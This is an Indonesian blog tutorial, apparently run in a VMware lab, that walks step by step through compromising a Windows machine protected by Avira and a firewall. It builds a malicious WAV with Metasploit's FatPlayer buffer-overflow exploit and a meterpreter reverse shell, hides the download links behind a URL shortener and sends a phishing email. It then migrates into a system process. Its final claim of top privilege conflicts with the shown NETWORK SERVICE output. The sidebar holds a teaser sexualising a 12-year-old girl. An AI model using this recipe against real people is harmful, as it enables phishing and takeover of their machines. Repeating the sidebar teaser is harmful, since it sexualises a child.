Metasploit VS Antivirus + Firewall
Metasploit VS Antivirus + Firewall
Metasploit
VS
Firewall dan AVIRA
Dalam keadaan ini, attacker tidak dapat melakukan proses ping ke target (karena firewall). Dan attacker tidak bisa mengirim payload Trojan karena adanya antivirus. AVIRA sudah di update dengan versi terbaru (cek screen shoot). Kali ini saya akan mencoba menyerang system dengan memanfaatkan celah buffer overflow pada fatplayer versi 0.6 (terbaru).
Preparation:
- Metasploit
- Apache2
- URL Shortener
- sendEmail
Briefing:
- Buat file bertipe wav dengan exploit/windows/fileformat/fatplayer_wav
- Pindahkan file tersebut ke direktori /var/www
- Jalankan service Apache2
- Gunakan URL shortener
- Jalankan exploit/multi/handler
- Kirim Email ke korban
- Korban mendownload file dan memainkan file tersebut
- Game Over
1. Buat file bertipe wav dengan exploit/windows/fileformat/fatplayer_wav
Buka terminal, lalu masukan perintah:
root@red-dragon:~# msfconsole
Dalam konsol msf, masukan perintah:
msf > use exploit/windows/fileformat/fatplayer_wav
msf exploit(fatplayer_wav) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(fatplayer_wav) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(fatplayer_wav) > set LPORT 4444
LPORT => 4444
msf exploit(fatplayer_wav) > set FILENAME GarudaDiDadaku.wav
FILENAME => GarudaDiDadaku.wav
msf exploit(fatplayer_wav) > exploit
[*] Creating 'GarudaDiDadaku.wav' file ...
[+] GarudaDiDadaku.wav stored at /root/.msf4/local/GarudaDiDadaku.wav
2. Pindahkan file tersebut ke direktori /var/www
Buka terminal, lalu masukan peritah:
root@red-dragon:~# cp /root/.msf4/local/GarudaDiDadaku.wav /var/www/GarudaDiDadaku.wav
3. Jalankan service Apache2
Buka terminal, lalu masukan perintah:
root@red-dragon:~# /etc/init.d/apache2 restart
web server apache2 ... waiting . [ OK ]
4. Gunakan URL shortener
Gunakan URL shortener untuk membungkus link yang mencurigakan kepada korban. Kali ii saya menggunakan URL Shortener yang disediakan oleh Google. Yaitu http://goo.gl
Kali ini saya akan memperpendek url http://sourceforge.net/projects/fatplayer/files/Fat%20Player/Fat%20Player%200.6b/FatPlayer_06b_Win32.exe/download dan http://192.168.1.5/GarudaDiDadaku.wav
Hasilnya:
Dan
Kembali ke konsol metasploit, dan masukan perintah:
msf exploit(fatplayer_wav) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.5:4444
[*] Starting the payload handler...
msf exploit(handler) >
6. Kirim Email ke korban
Setelah exploit multi handler berjalan, sekarang saatnya memancing korban kita untuk mendownload file yang berisi exploit untuk mengambil alih system. Buka terminal, dan masukan perintah:
root@red-dragon:~# sendEmail -f "Attacker<badguy@internet.com>" -t hanggara33@gmail.com -u "Lagu baru Garuda Di dadaku" -m "Lagu Garuda di dadaku diaransemen ulang nih sama NETRAL. Download playernya di http://goo.gl/oKUHA kemudian download filenya di http://goo.gl/QIFuh" -s smtp.gmail.com:587 -xu doubledragon666@gmail.com -xp xxxxxxx
Keterangan:
-f adalah inisial pengirim email
-t adalah target
-u adalah subject email
-m adalah isi pesan
-s adalah server email
-xu adalah account email attacker
-xp adalah password account email attacker
7. Korban mendownload file dan memainkan file tersebut
Sambil menunggu korban, mari kita lihat apa yang terjadi dengan korban kita.
korban: "Oh my God. Saya dapat email...."
Kemudian korban mendownload fatplayer, dan file exploit yang kita buat.
Karena curiga file tersebut hanya sebesar 4 KB. Korban memindai file tersebut dengan antivirus AVIRA yang baru diupdate.
Setelah scan selesai, AVIRA menyatakan bahwa file terbebas dari virus, dan korban memainkan lagu tersebut dengan fatplayer.
Tidak terjadi apa-apa....
8. Game Over
Mari kita cek metasploit kita.
Kemudian kita cek informasi system dan jabatan kita di dalam system, dengan perintah sysinfo kemudiangetuid
Omong kosong! Saya ingin menjadi NT AUTHORITY\NETWORK SERVICE di sini. Saya akan melakukan migrasi ke sebuah proses yang dijalankan oleh NT AUTHORITY\NETWORK SERVICE. Untuk melakukan migrasi, kita harus mengetahui process ID yang dijalankan oleh NT AUTHORITY\NETWORK SERVICE. Masukan perintah ps.
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1148 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1276 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1388 explorer.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\Explorer.EXE
1532 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1592 sched.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
1704 VMwareTray.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1712 vmtoolsd.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1720 rundll32.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\system32\rundll32.exe
1728 avgnt.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
1948 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1996 avguard.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
2008 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
2760 TPAutoConnect.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
3080 FatPlayer.exe x86 0 ROOT-11E5DB48A8\Administrator C:\Documents and Settings\Administrator\My Documents\Downloads\FatPlayer 0.6b\FatPlayer.exe
3124 wuauclt.exe x86 0 ROOT-11E5DB48A8\Administrator C:\WINDOWS\system32\wuauclt.exe
4 System x86 0
452 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
540 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
604 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
628 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
680 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
692 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
844 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
856 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
964 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
Kemudian migrasi ke process 964, yaitu process svchost.exe yang dijalankan oleh NT AUTHORITY\SYSTEM .
meterpreter > migrate 964
[*] Migrating to 964...
[*] Migration completed successfully.
meterpreter >
Kemudian cek kembali jabatan kita di dalam system tersebut dengan perintah getuid.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter >
GAME OVER
Kita mendapatkan jabatan tertinggi untuk mengendalikan system korban.
Langganan:
Posting Komentar (Atom)
Popular Posts
-
1.LOAD_FILE Load file adalah query SQL untuk meng-load suatu file scara remote..kurang lebihnya seperti itu ..
-
assalamualaikummm permisi bang ane cuma mau share,.... gimana cara atau trik membuat Flashing screen ( atau layar menjadi kelap kelip,....) -
pada kamus ini terdapat pilihan opsi dari bahasa Perancis ke Indonesia, dari bahasa Indonesia ke Perancis, lihat seluruh kata, tes, help se... -
Situs jejaring sosial seperti Twitter dan Facebookbisa menjadi sarana flirting dan aturan berpacaran lewat situs jejaring sosial ini... -
siap meluncur di tunggu dari kawan kawan untuk sharing bugs and scaning pake bot
-
Buat Ngerjaain Koneksi Orang Gunakan Seperlunya... Misalnya buat mutusin koneksi orang yang lagi buka situs porno
-
Apakah Anda punya sahabat atau rekan yang tampan, mapan tapi sampai sekarang masih senang sendiri dan belum berkeinginan punya pacar. Wa...
-
ada model baru dari vietnam. baru 12 taun gan. liat kaki nya deh gan, bikin deg deg an Cewek Idaman : Lê Hoàng Bảo Trân (Le Hoang Bao ... -
Assalamu alaikum Sudah lama tidak posting blog nih disini saya akan membahas cara membuat program transaksi penjualan dengan Fox pro ... -
Ciuman adalah bahasa tubuh yang populer untuk mengungkapkan rasa sayang kepada pasangan, teman maupun keluarga. Tapi ada beberapa tipe...
Tidak ada komentar:
Posting Komentar